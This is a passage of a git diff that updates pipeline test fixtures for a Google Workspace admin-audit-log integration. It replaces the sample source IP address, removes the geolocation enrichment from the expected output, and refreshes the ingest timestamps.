"98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1342,35 +1054,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815046200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:50.954937300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_SERVICE_ENABLED", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log index 1035f42a2fb..1a75621dca4 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log @@ -1,24 +1,24 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json index 5672e20d0dc..02d23d9551d 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351368500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": 